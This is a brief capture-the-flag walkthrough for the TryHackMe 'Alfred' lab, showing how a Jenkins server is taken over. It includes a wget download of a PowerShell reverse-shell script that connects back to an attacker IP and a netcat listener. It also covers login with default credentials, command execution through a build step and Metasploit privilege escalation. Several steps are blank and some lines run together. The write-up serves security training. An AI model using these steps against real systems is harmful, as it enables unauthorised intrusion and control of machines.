Alfred
Room Link: https://tryhackme.com/room/alfred
Initial Access
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Edit the file and add the following to the end of the file. This is just to make it a bit easier when we use it later.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.135.134 -Port 4444How many ports are open? (TCP only)
nmap -A 10.10.98.134What is the username and password for the log in panel(in the format username:password)
admin:admin
Getting shell
Kali
rlwrap nc -lvnp 4444Jenkins


Under Build add a build step and select 'Execute Windows batch command' then add the following in the command field



Switching Shells
Kali
Kali
Victim

Privilege Escalation
Victim (Metasploit)

We are now NT Authority

Migrating processes to make sure we have correct permissions for the privileged user. The safest process to pick is the services.exe process


Last updated